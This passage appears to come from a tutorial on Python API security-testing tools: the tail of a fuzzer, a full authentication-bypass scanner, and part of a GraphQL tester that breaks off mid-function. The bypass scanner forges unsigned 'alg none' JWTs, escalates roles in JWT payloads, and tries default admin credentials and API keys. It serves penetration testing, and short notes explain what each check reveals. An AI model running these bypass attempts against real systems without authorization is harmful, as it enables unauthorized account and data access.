        for vuln in self.vulnerabilities_found:
            vuln_type = vuln.get('vulnerability_type', 'Unknown')
            vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
        for vuln_type, count in vuln_types.items():
            print(f"  - {vuln_type}: {count}")
        print(f"\nTotal Requests Sent: {len(self.results)}")
        print(f"Full results saved to: {self.output_file}")
        print("="*60 + "\n")


# Main function
def main():
    parser = argparse.ArgumentParser(description="API Security Testing Framework")
    parser.add_argument("url", help="Base URL of the API to test")
    parser.add_argument("-t", "--token", help="Authorization token")
    parser.add_argument("-w", "--wordlist", help="Path to endpoint wordlist file")
    parser.add_argument("-o", "--output", help="Output file for results")
    parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
    parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests in seconds")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
    args = parser.parse_args()
    # Load wordlist if provided
    wordlist = None
    if args.wordlist:
        try:
            with open(args.wordlist, 'r') as f:
                wordlist = [line.strip() for line in f if line.strip()]
        except Exception as e:
            print(f"Error loading wordlist: {e}")
            sys.exit(1)
    # Create and run the fuzzer
    fuzzer = APIFuzzer(
        base_url=args.url,
        auth_token=args.token,
        threads=args.concurrency,
        delay=args.delay,
        output_file=args.output,
        verbose=args.verbose
    )
    # Pass the loaded wordlist through; previously it was read but never used
    fuzzer.run_full_scan(wordlist)


if __name__ == "__main__":
    main()
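The fuzzer's detection step rests on comparing each payload response against a baseline. The sketch below isolates that arithmetic so the thresholds are easier to reason about. `response_delta` is a hypothetical helper that mirrors the length-percentage calculation in `detect_vulnerability`, and the status codes and body sizes are made-up sample values.

```python
def response_delta(baseline_status, baseline_length, status, length):
    """Return (status_changed, length_change_percent) relative to the baseline."""
    status_changed = status != baseline_status
    diff = abs(length - baseline_length)
    percent = (diff / baseline_length * 100) if baseline_length > 0 else 0
    return status_changed, percent


# Baseline: HTTP 200 with a 1,000-character body.
# Payload response: HTTP 500 with a 1,400-character body.
changed, pct = response_delta(200, 1000, 500, 1400)

# The SQL injection heuristic requires both a status change and a >30% length change
flagged_as_sqli = changed and pct > 30
print(f"status changed: {changed}, length change: {pct:.1f}%, flagged: {flagged_as_sqli}")
```

Heuristics like this produce candidates, not confirmed findings. Each flagged request still needs manual verification.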
Advanced API Authentication Bypass Framework
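JWT segments use base64url encoding with the padding stripped (RFC 7515), which is easy to get wrong when tokens are built by hand. The sketch below shows the encoding in isolation and how an unsigned `alg: none` token is assembled. The helper names are hypothetical and the claims are sample values; it uses only the standard library.

```python
import base64
import json


def b64url_encode(data: bytes) -> str:
    """Base64url-encode and strip '=' padding, as JWT segments require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the stripped padding, then base64url-decode."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def make_unsigned_token(claims: dict) -> str:
    """Build a token with alg 'none' and an empty signature segment."""
    header = {"alg": "none", "typ": "JWT"}
    parts = [
        b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
        for obj in (header, claims)
    ]
    return ".".join(parts) + "."


token = make_unsigned_token({"user_id": 1, "role": "admin"})
header_b64, payload_b64, signature = token.split(".")
print(token)
print(json.loads(b64url_decode(payload_b64)))
```

A correctly configured server rejects such a token outright. Acceptance indicates that the verifier trusts the `alg` header supplied by the client.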
# API Authentication Bypass Framework
import jwt
import base64
import json
import hashlib
import hmac
import requests
import argparse
import sys
import time
import random
from concurrent.futures import ThreadPoolExecutor


class APIAuthBypass:
    def __init__(self, target_url, output_file=None, threads=5, verbose=False):
        self.target_url = target_url
        self.output_file = output_file or f"auth_bypass_results_{int(time.time())}.json"
        self.threads = threads
        self.verbose = verbose
        self.session = requests.Session()
        self.results = []
        self.successful_bypasses = []
        # Default headers
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }

    def log(self, message, level="INFO"):
        """Log messages if verbose mode is enabled"""
        if self.verbose or level == "ERROR" or level == "CRITICAL":
            timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
            print(f"[{timestamp}] [{level}] {message}")

    def test_no_auth(self, endpoint):
        """Test if endpoint works without authentication"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing endpoint without auth: {url}")
        try:
            response = self.session.get(url, headers=self.headers, timeout=10)
            result = {
                "test_type": "no_auth",
                "endpoint": endpoint,
                "status_code": response.status_code,
                "response_length": len(response.text),
                "success": self._is_successful_response(response)
            }
            self.results.append(result)
            if result["success"]:
                self.log(f"NO AUTH BYPASS: Endpoint {endpoint} accessible without authentication!", "CRITICAL")
                self.successful_bypasses.append(result)
            return result
        except Exception as e:
            self.log(f"Error testing no auth on {endpoint}: {str(e)}", "ERROR")
            return None

    def test_header_variations(self, endpoint, token=None):
        """Test various header permutations for auth bypass"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing header variations on: {url}")
        # Header variations to test
        variations = [
            # Common auth header variations
            {"Authorization": ""},
            {"Auth": "true"},
            {"Authentication": "1"},
            {"X-API-Key": ""},
            {"api-key": ""},
            {"apikey": ""},
            {"x-api-token": ""},
            # Case sensitivity tests
            {"AUTHORIZATION": f"Bearer {token}" if token else ""},
            {"authorization": f"bearer {token}" if token else ""},
            # Common default/test credentials
            {"Authorization": "Bearer test"},
            {"Authorization": "Bearer admin"},
            {"Authorization": "Bearer 1234567890"},
            {"X-API-Key": "test"},
            {"X-API-Key": "admin"},
            {"X-API-Key": "1234567890"},
            # Basic Auth variations
            {"Authorization": "Basic YWRtaW46YWRtaW4="},  # admin:admin
            {"Authorization": "Basic YWRtaW46cGFzc3dvcmQ="},  # admin:password
            {"Authorization": "Basic dGVzdDp0ZXN0"},  # test:test
            {"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="},  # guest:guest
            # Authorization header removal test
            {}
        ]
        for header_variation in variations:
            try:
                # Use custom headers for this request
                test_headers = self.headers.copy()
                # Remove any existing auth headers
                auth_headers = ["Authorization", "X-API-Key", "api-key", "apikey", "Auth", "Authentication"]
                for auth_header in auth_headers:
                    if auth_header in test_headers:
                        del test_headers[auth_header]
                # Add the test variation
                test_headers.update(header_variation)
                response = self.session.get(url, headers=test_headers, timeout=10)
                result = {
                    "test_type": "header_variation",
                    "endpoint": endpoint,
                    "variation": header_variation,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                self.results.append(result)
                if result["success"]:
                    self.log(f"HEADER BYPASS: Endpoint {endpoint} accessible with header variation: {header_variation}", "CRITICAL")
                    self.successful_bypasses.append(result)
                # Small delay
                time.sleep(0.5)
            except Exception as e:
                self.log(f"Error testing header variation {header_variation} on {endpoint}: {str(e)}", "ERROR")

    def test_jwt_vulnerabilities(self, endpoint, valid_token=None):
        """Test for JWT-related vulnerabilities"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing JWT vulnerabilities on: {url}")
        # If we don't have a valid token, try to create some test tokens
        if not valid_token:
            test_tokens = [
                self._create_test_jwt({"user_id": 1, "role": "admin"}),
                self._create_test_jwt({"user_id": 1, "role": "user"}),
                self._create_test_jwt({"admin": True})
            ]
        else:
            # Parse the provided token to create test variations
            try:
                token_parts = valid_token.split('.')
                if len(token_parts) == 3:
                    # JWT segments are base64url-encoded with padding stripped,
                    # so restore the padding and use the URL-safe alphabet
                    payload_segment = token_parts[1]
                    padding = "=" * (-len(payload_segment) % 4)
                    payload = json.loads(base64.urlsafe_b64decode(payload_segment + padding).decode('utf-8'))
                    # Create variations based on the real token
                    test_tokens = [valid_token]  # Start with the valid token
                    # Try to elevate privileges in the payload
                    modified_payload = payload.copy()
                    # Look for role/permission fields to modify
                    privilege_fields = ['role', 'roles', 'permissions', 'isAdmin', 'is_admin', 'admin', 'scope']
                    for field in privilege_fields:
                        if field in modified_payload:
                            if isinstance(modified_payload[field], str):
                                modified_payload[field] = "admin"
                            elif isinstance(modified_payload[field], list):
                                # Build a new list so the original payload is not mutated
                                modified_payload[field] = modified_payload[field] + ["admin"]
                            elif isinstance(modified_payload[field], bool):
                                modified_payload[field] = True
                    # Add admin if not present
                    if 'role' not in modified_payload:
                        modified_payload['role'] = "admin"
                    if 'admin' not in modified_payload:
                        modified_payload['admin'] = True
                    # Create token with modified payload but same header/signature
                    modified_payload_b64 = base64.urlsafe_b64encode(
                        json.dumps(modified_payload).encode()
                    ).decode().rstrip('=')
                    modified_token = f"{token_parts[0]}.{modified_payload_b64}.{token_parts[2]}"
                    test_tokens.append(modified_token)
                    # Try 'none' algorithm attack
                    none_header = {"alg": "none", "typ": "JWT"}
                    none_header_b64 = base64.urlsafe_b64encode(
                        json.dumps(none_header).encode()
                    ).decode().rstrip('=')
                    none_token = f"{none_header_b64}.{token_parts[1]}."
                    test_tokens.append(none_token)
                    # Same with modified payload
                    none_token_admin = f"{none_header_b64}.{modified_payload_b64}."
                    test_tokens.append(none_token_admin)
                else:
                    # Not a valid JWT, just use our test tokens
                    test_tokens = [
                        self._create_test_jwt({"user_id": 1, "role": "admin"}),
                        self._create_test_jwt({"user_id": 1, "role": "user", "exp": int(time.time()) + 3600}),
                        self._create_test_jwt({"admin": True})
                    ]
            except Exception as e:
                self.log(f"Error parsing valid token: {str(e)}", "ERROR")
                test_tokens = [
                    self._create_test_jwt({"user_id": 1, "role": "admin"}),
                    self._create_test_jwt({"user_id": 1, "role": "user"}),
                    self._create_test_jwt({"admin": True})
                ]
        # Test each token
        for token in test_tokens:
            try:
                test_headers = self.headers.copy()
                test_headers["Authorization"] = f"Bearer {token}"
                response = self.session.get(url, headers=test_headers, timeout=10)
                result = {
                    "test_type": "jwt_vulnerability",
                    "endpoint": endpoint,
                    "token": token,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                self.results.append(result)
                if result["success"]:
                    self.log(f"JWT BYPASS: Endpoint {endpoint} accessible with modified JWT: {token[:20]}...", "CRITICAL")
                    self.successful_bypasses.append(result)
                # Small delay
                time.sleep(0.5)
            except Exception as e:
                self.log(f"Error testing JWT {token[:20]}... on {endpoint}: {str(e)}", "ERROR")
def test_oauth_vulnerabilities(self, endpoint):
"""Test for OAuth-related vulnerabilities"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing OAuth vulnerabilities on: {url}")
# Common OAuth parameters to test
oauth_params = [
{"access_token": "EXAMPLE_TOKEN"},
{"code": "EXAMPLE_CODE"},
{"id_token": "EXAMPLE_ID_TOKEN"},
{"token": "EXAMPLE_TOKEN"},
{"oauth_token": "EXAMPLE_OAUTH_TOKEN"}
]
for params in oauth_params:
try:
response = self.session.get(url, headers=self.headers, params=params, timeout=10)
result = {
"test_type": "oauth_vulnerability",
"endpoint": endpoint,
"params": params,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"OAUTH BYPASS: Endpoint {endpoint} accessible with OAuth params: {params}", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing OAuth params {params} on {endpoint}: {str(e)}", "ERROR")
def test_api_key_bypasses(self, endpoint):
"""Test for API key bypass techniques"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing API key bypasses on: {url}")
# API key locations to test
locations = [
# Headers
{"type": "header", "name": "X-API-Key", "value": "test_key"},
{"type": "header", "name": "api-key", "value": "test_key"},
{"type": "header", "name": "apikey", "value": "test_key"},
{"type": "header", "name": "x-api-token", "value": "test_key"},
# URL parameters
{"type": "param", "name": "api_key", "value": "test_key"},
{"type": "param", "name": "apikey", "value": "test_key"},
{"type": "param", "name": "key", "value": "test_key"},
{"type": "param", "name": "api_token", "value": "test_key"},
# Common test values
{"type": "header", "name": "X-API-Key", "value": "1234567890"},
{"type": "header", "name": "X-API-Key", "value": "admin"},
{"type": "header", "name": "X-API-Key", "value": "test"},
{"type": "param", "name": "api_key", "value": "1234567890"},
{"type": "param", "name": "api_key", "value": "admin"},
{"type": "param", "name": "api_key", "value": "test"}
]
for location in locations:
try:
test_headers = self.headers.copy()
params = {}
if location["type"] == "header":
test_headers[location["name"]] = location["value"]
else: # param
params[location["name"]] = location["value"]
response = self.session.get(url, headers=test_headers, params=params, timeout=10)
result = {
"test_type": "api_key_bypass",
"endpoint": endpoint,
"location": location,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"API KEY BYPASS: Endpoint {endpoint} accessible with API key in {location['type']} {location['name']}: {location['value']}", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing API key in {location['type']} {location['name']} on {endpoint}: {str(e)}", "ERROR")
def _create_test_jwt(self, payload, algorithm="HS256"):
"""Create a test JWT token with the specified payload"""
# Add common JWT claims if not present
if "iat" not in payload:
payload["iat"] = int(time.time())
if "exp" not in payload:
payload["exp"] = int(time.time()) + 3600 # 1 hour
if "jti" not in payload:
payload["jti"] = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=10))
# Create the JWT
token = jwt.encode(payload, "test_secret", algorithm=algorithm)
# Handle different JWT library versions
if isinstance(token, bytes):
return token.decode('utf-8')
return token
    def _is_successful_response(self, response):
        """Heuristically determine if a response indicates successful access"""
        body = response.text.lower()
        # Common error messages or patterns in responses
        # that would indicate that auth failed
        error_indicators = [
            "not authorized",
            "unauthorized",
            "forbidden",
            "access denied",
            "authentication required",
            "invalid token",
            "invalid api key",
            "permission denied"
        ]
        # Check the body first: some APIs return 200 with an error payload
        if any(indicator in body for indicator in error_indicators):
            return False
        # No auth error in the body, so 2xx is treated as success
        if 200 <= response.status_code < 300:
            return True
        # If it's a 4xx code, it might be auth failure, but check whether
        # the response still carries something that looks like real content
        if 400 <= response.status_code < 500:
            content_indicators = ["data", "user", "id", "name", "result", "success"]
            try:
                json_data = response.json()
            except ValueError:
                # Not JSON: only flag longer HTML pages that contain layout tags
                return (
                    len(response.text) > 100  # Arbitrary threshold
                    and "<html" in body
                    and ("<table" in body or "<div" in body)
                )
            # Only a JSON object has top-level keys to inspect
            if isinstance(json_data, dict):
                for key, value in json_data.items():
                    if key.lower() in content_indicators and value not in (None, "", []):
                        return True
            # No evidence of real content, probably auth failure
            return False
        return False
def scan_endpoints(self, endpoints, valid_token=None):
"""Run all tests on the specified endpoints"""
self.log(f"Starting scan on {len(endpoints)} endpoints")
for endpoint in endpoints:
self.log(f"\nTesting endpoint: {endpoint}")
# Run all tests sequentially for each endpoint
self.test_no_auth(endpoint)
self.test_header_variations(endpoint, valid_token)
self.test_jwt_vulnerabilities(endpoint, valid_token)
self.test_oauth_vulnerabilities(endpoint)
self.test_api_key_bypasses(endpoint)
self.log(f"\nScan completed. Found {len(self.successful_bypasses)} potential bypasses.")
self.save_results()
    def scan_with_threading(self, endpoints, valid_token=None):
        """Run tests with threading for faster scanning"""
        self.log(f"Starting threaded scan on {len(endpoints)} endpoints with {self.threads} threads")
        futures = []
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            for endpoint in endpoints:
                futures.append(executor.submit(self.test_no_auth, endpoint))
                futures.append(executor.submit(self.test_header_variations, endpoint, valid_token))
                futures.append(executor.submit(self.test_jwt_vulnerabilities, endpoint, valid_token))
                futures.append(executor.submit(self.test_oauth_vulnerabilities, endpoint))
                futures.append(executor.submit(self.test_api_key_bypasses, endpoint))
        # All workers have finished here; report exceptions that would otherwise be lost
        for future in futures:
            error = future.exception()
            if error is not None:
                self.log(f"Test raised an exception: {error}", "ERROR")
        self.log(f"\nThreaded scan completed. Found {len(self.successful_bypasses)} potential bypasses.")
        self.save_results()
def save_results(self):
"""Save scan results to a file"""
output = {
"scan_info": {
"target_url": self.target_url,
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"total_tests": len(self.results),
"successful_bypasses": len(self.successful_bypasses)
},
"successful_bypasses": self.successful_bypasses,
"all_results": self.results
}
with open(self.output_file, 'w') as f:
json.dump(output, f, indent=2)
self.log(f"Results saved to {self.output_file}")
def print_summary(self):
"""Print a summary of findings"""
print("\n" + "="*60)
print(f"API AUTHENTICATION BYPASS SUMMARY FOR {self.target_url}")
print("="*60)
if not self.successful_bypasses:
print("\nNo successful bypass techniques found.")
else:
print(f"\nSuccessful Bypasses: {len(self.successful_bypasses)}")
# Group by test type
bypass_types = {}
for bypass in self.successful_bypasses:
test_type = bypass.get('test_type', 'Unknown')
if test_type not in bypass_types:
bypass_types[test_type] = []
bypass_types[test_type].append(bypass)
# Print by type
for test_type, bypasses in bypass_types.items():
print(f"\n{test_type.upper()} BYPASSES ({len(bypasses)}):")
for i, bypass in enumerate(bypasses, 1):
endpoint = bypass.get('endpoint', 'Unknown')
if test_type == "no_auth":
print(f" {i}. Endpoint accessible without authentication: {endpoint}")
elif test_type == "header_variation":
variation = bypass.get('variation', {})
print(f" {i}. Endpoint {endpoint} accessible with: {variation}")
elif test_type == "jwt_vulnerability":
token = bypass.get('token', '')
if len(token) > 20:
token = token[:20] + "..."
print(f" {i}. Endpoint {endpoint} accessible with JWT: {token}")
elif test_type == "oauth_vulnerability":
params = bypass.get('params', {})
print(f" {i}. Endpoint {endpoint} accessible with OAuth params: {params}")
elif test_type == "api_key_bypass":
location = bypass.get('location', {})
print(f" {i}. Endpoint {endpoint} accessible with API key in {location.get('type')} {location.get('name')}: {location.get('value')}")
else:
print(f" {i}. Unknown bypass type for endpoint: {endpoint}")
print("\nTotal Tests Run:", len(self.results))
print(f"Full results saved to: {self.output_file}")
print("="*60 + "\n")
# Example usage
def main():
parser = argparse.ArgumentParser(description="API Authentication Bypass Tool")
parser.add_argument("url", help="Base URL of the API to test")
parser.add_argument("-e", "--endpoints", help="Comma-separated list of endpoints to test")
parser.add_argument("-f", "--file", help="File containing endpoints (one per line)")
parser.add_argument("-t", "--token", help="Valid JWT token for comparison tests")
parser.add_argument("-o", "--output", help="Output file for results")
parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
# Get endpoints list
endpoints = []
if args.endpoints:
endpoints = [e.strip() for e in args.endpoints.split(',') if e.strip()]
elif args.file:
try:
with open(args.file, 'r') as f:
endpoints = [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"Error reading endpoints file: {e}")
sys.exit(1)
else:
# Default endpoints to try
endpoints = [
"users", "user", "admin", "admins", "account", "accounts",
"profile", "profiles", "login", "logout", "auth", "authenticate",
"token", "api/users", "api/admin", "api/v1/users", "api/v1/admin",
"v1/users", "v1/user", "v1/admin", "api/account", "api/profile"
]
scanner = APIAuthBypass(
target_url=args.url,
output_file=args.output,
threads=args.concurrency,
verbose=args.verbose
)
if args.concurrency > 1:
scanner.scan_with_threading(endpoints, args.token)
else:
scanner.scan_endpoints(endpoints, args.token)
scanner.print_summary()
if __name__ == "__main__":
main()
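The JWT checks in the tool above depend on each token segment being encoded the way JWT expects: URL-safe base64 with the padding removed. The following is a minimal, standalone sketch of that encoding and of building an unsigned `alg: none` token. The helper names `b64url`, `b64url_decode`, and `forge_none_token` are illustrative assumptions and are not part of the tool.

```python
import base64
import json


def b64url(data: bytes) -> str:
    """Base64url-encode bytes and strip '=' padding, as JWT segments require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment after restoring the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def forge_none_token(claims: dict) -> str:
    """Build an unsigned token: alg=none header, claims, empty signature."""
    header = {"alg": "none", "typ": "JWT"}
    parts = [
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(claims, separators=(",", ":")).encode()),
        "",  # empty signature segment, so the token ends with a dot
    ]
    return ".".join(parts)


if __name__ == "__main__":
    # Hypothetical claims, for illustration only
    print(forge_none_token({"user_id": 1, "role": "admin"}))
```

Standard `base64.b64encode` can emit `+` and `/`, which are not valid in a JWT segment, so a token built with it may be rejected for encoding reasons rather than because the server verified the signature. That would hide a real `alg: none` weakness.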
GraphQL Security Testing Framework
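One of the checks in this framework probes whether the server enforces a query depth limit. As a small sketch of how such a nested query could be assembled, assuming a type with a field that refers back to the same type (the function name and the `user` and `friends` fields are hypothetical):

```python
def build_nested_query(root_field: str, recursive_field: str, depth: int) -> str:
    """Nest `recursive_field` inside itself `depth` times under `root_field`.

    The innermost selection is `__typename`, a meta-field available on every
    object type, so the leaf of the query is always a valid scalar selection.
    """
    selection = "__typename"
    for _ in range(depth):
        selection = f"{recursive_field} {{ {selection} }}"
    return f"query {{ {root_field} {{ {selection} }} }}"


if __name__ == "__main__":
    # Hypothetical schema: a `user` query whose `friends` field returns users
    print(build_nested_query("user", "friends", 2))
```

Ending the nesting on a scalar matters because GraphQL rejects an object-typed field that has no selection set. A query that fails validation for that reason says nothing about depth limiting.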
# GraphQL API Security Testing Framework
import requests
import json
import argparse
import time
import os
import sys
from concurrent.futures import ThreadPoolExecutor
class GraphQLSecurity:
def __init__(self, endpoint, headers=None, output_dir=None, threads=5, verbose=False):
self.endpoint = endpoint
self.headers = headers or {}
self.output_dir = output_dir or "graphql_results"
self.threads = threads
self.verbose = verbose
self.session = requests.Session()
# Ensure headers contain content-type for GraphQL
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/json'
# Create output directory if it doesn't exist
os.makedirs(self.output_dir, exist_ok=True)
# Results storage
self.schema = None
self.types = []
self.queries = []
self.mutations = []
self.fields = {}
self.vulnerabilities = []
def log(self, message, level="INFO"):
"""Log messages based on verbosity"""
if self.verbose or level in ["ERROR", "CRITICAL", "WARNING"]:
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print(f"[{timestamp}] [{level}] {message}")
def run_query(self, query, variables=None, operation_name=None):
"""Execute a GraphQL query"""
payload = {
"query": query
}
if variables:
payload["variables"] = variables
if operation_name:
payload["operationName"] = operation_name
try:
response = self.session.post(
self.endpoint,
headers=self.headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return response.json()
else:
self.log(f"Query failed with status code {response.status_code}: {response.text}", "ERROR")
return None
except Exception as e:
self.log(f"Error executing query: {str(e)}", "ERROR")
return None
def get_schema(self):
"""Retrieve the GraphQL schema through introspection"""
self.log("Retrieving GraphQL schema through introspection...")
introspection_query = """
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
"""
result = self.run_query(introspection_query)
if result and result.get('data') and '__schema' in result['data']:
self.schema = result['data']['__schema']
self.log("Successfully retrieved GraphQL schema")
# Save schema to file
with open(os.path.join(self.output_dir, "schema.json"), 'w') as f:
json.dump(self.schema, f, indent=2)
# Process schema information
self._process_schema()
return True
else:
self.log("Failed to retrieve GraphQL schema. Introspection may be disabled.", "WARNING")
return False
def _process_schema(self):
"""Process the retrieved schema to extract useful information"""
if not self.schema:
return
self.log("Processing schema information...")
# Extract types
for type_info in self.schema['types']:
# Skip introspection types
if type_info['name'].startswith('__'):
continue
# Store type information
self.types.append(type_info)
# Extract fields for this type
if type_info['fields']:
self.fields[type_info['name']] = type_info['fields']
# Find query type
query_type_name = self.schema['queryType']['name']
for type_info in self.types:
if type_info['name'] == query_type_name and type_info['fields']:
self.queries = type_info['fields']
# Find mutation type
if self.schema['mutationType'] and self.schema['mutationType']['name']:
mutation_type_name = self.schema['mutationType']['name']
for type_info in self.types:
if type_info['name'] == mutation_type_name and type_info['fields']:
self.mutations = type_info['fields']
self.log(f"Found {len(self.types)} types, {len(self.queries)} queries, and {len(self.mutations)} mutations")
def get_type_fields(self, type_name):
"""Get fields for a specific type"""
return self.fields.get(type_name, [])
def test_queries(self):
"""Test all available queries for security issues"""
if not self.queries:
self.log("No queries found to test", "WARNING")
return
self.log(f"Testing {len(self.queries)} queries for security issues...")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.test_query, self.queries)
def test_query(self, query_info):
"""Test a specific query for security issues"""
query_name = query_info['name']
self.log(f"Testing query: {query_name}")
# Craft a minimal query
args = self._build_args_for_query(query_info)
query_string = f"query {{ {query_name}{args} }}"
# Test direct access
self.test_direct_access(query_name, query_string)
# Test for excessive data exposure
self.test_data_exposure(query_name, query_info)
# Test for injection vulnerabilities
self.test_injection(query_name, query_info)
def test_mutations(self):
"""Test all available mutations for security issues"""
if not self.mutations:
self.log("No mutations found to test", "WARNING")
return
self.log(f"Testing {len(self.mutations)} mutations for security issues...")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.test_mutation, self.mutations)
def test_mutation(self, mutation_info):
"""Test a specific mutation for security issues"""
mutation_name = mutation_info['name']
self.log(f"Testing mutation: {mutation_name}")
# Craft arguments for the mutation
args = self._build_args_for_mutation(mutation_info)
mutation_string = f"mutation {{ {mutation_name}{args} }}"
# Test direct access
self.test_direct_access(mutation_name, mutation_string, is_mutation=True)
# Test for CSRF
self.test_csrf(mutation_name, mutation_info)
# Test for injection vulnerabilities
self.test_injection(mutation_name, mutation_info, is_mutation=True)
def _build_args_for_query(self, query_info):
"""Build arguments string for a query"""
if not query_info['args']:
return ""
args_parts = []
for arg in query_info['args']:
# Generate a value based on the type
value = self._generate_value_for_type(arg['type'])
args_parts.append(f"{arg['name']}: {value}")
if args_parts:
return f"({', '.join(args_parts)})"
return ""
def _build_args_for_mutation(self, mutation_info):
"""Build arguments string for a mutation"""
if not mutation_info['args']:
return ""
args_parts = []
for arg in mutation_info['args']:
# Generate a value based on the type
value = self._generate_value_for_type(arg['type'])
args_parts.append(f"{arg['name']}: {value}")
if args_parts:
return f"({', '.join(args_parts)})"
return ""
def _generate_value_for_type(self, type_info):
"""Generate a test value based on the GraphQL type"""
# Handle non-null wrapper
if type_info['kind'] == 'NON_NULL':
return self._generate_value_for_type(type_info['ofType'])
# Handle list wrapper
if type_info['kind'] == 'LIST':
inner_value = self._generate_value_for_type(type_info['ofType'])
return f"[{inner_value}]"
# Handle scalar types
if type_info['kind'] == 'SCALAR':
type_name = type_info['name']
if type_name == 'Int':
return "1"
elif type_name == 'Float':
return "1.0"
elif type_name == 'String':
return '"test"'
elif type_name == 'Boolean':
return "true"
elif type_name == 'ID':
return '"1"'
else:
return '"test"' # Default for unknown scalar
# Handle enum types
if type_info['kind'] == 'ENUM':
# Try to find the enum type to get a valid value
for type_def in self.types:
if type_def['name'] == type_info['name'] and type_def['enumValues']:
return type_def['enumValues'][0]['name']
return "UNKNOWN_ENUM_VALUE"
# Handle input object types
if type_info['kind'] == 'INPUT_OBJECT':
# Find the input object definition
input_fields = []
for type_def in self.types:
if type_def['name'] == type_info['name'] and type_def['inputFields']:
for field in type_def['inputFields']:
field_value = self._generate_value_for_type(field['type'])
input_fields.append(f"{field['name']}: {field_value}")
break
if input_fields:
return f"{{ {', '.join(input_fields)} }}"
return "{}" # Empty object as fallback
# Default for any other type
return "null"
def test_direct_access(self, operation_name, operation_string, is_mutation=False):
"""Test if an operation can be accessed directly without proper authorization"""
# Try with current credentials
result = self.run_query(operation_string)
# Check if the operation succeeded
if result and result.get('data') and result['data'].get(operation_name) is not None:
# Check if this is a sensitive operation that should be restricted
if any(keyword in operation_name.lower() for keyword in ['admin', 'delete', 'remove', 'update', 'create', 'user', 'account', 'private', 'secret', 'internal']):
vulnerability = {
"type": "unauthorized_access",
"operation": operation_name,
"operation_type": "mutation" if is_mutation else "query",
"severity": "high" if is_mutation else "medium",
"description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears to be accessible without proper authorization.",
"proof": operation_string,
"response": result
}
self.log(f"VULNERABILITY: Unauthorized access to {operation_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_data_exposure(self, query_name, query_info):
"""Test if a query exposes sensitive data"""
# Determine the return type of the query
return_type = query_info['type']
# Get to the base type (unwrap NON_NULL and LIST wrappers)
while return_type['kind'] in ['NON_NULL', 'LIST']:
return_type = return_type['ofType']
# If it's not an object type, skip
if return_type['kind'] != 'OBJECT':
return
type_name = return_type['name']
# Get fields for this type
type_fields = self.get_type_fields(type_name)
if not type_fields:
return
# Look for sensitive field names
sensitive_fields = []
for field in type_fields:
field_name = field['name'].lower()
if any(keyword in field_name for keyword in ['password', 'token', 'secret', 'key', 'auth', 'credit', 'ssn', 'social', 'private', 'hidden']):
sensitive_fields.append(field['name'])
if not sensitive_fields:
return
# Craft a query requesting these fields, with generated values for any arguments
args = self._build_args_for_query(query_info)
field_string = " ".join(sensitive_fields)
query_string = f"query {{ {query_name}{args} {{ {field_string} }} }}"
# Run the query
result = self.run_query(query_string)
# Check if we got sensitive data
if result and result.get('data') and result['data'].get(query_name) is not None:
# Check if any of the sensitive fields have values
data = result['data'][query_name]
exposed_fields = []
if isinstance(data, dict):
for field in sensitive_fields:
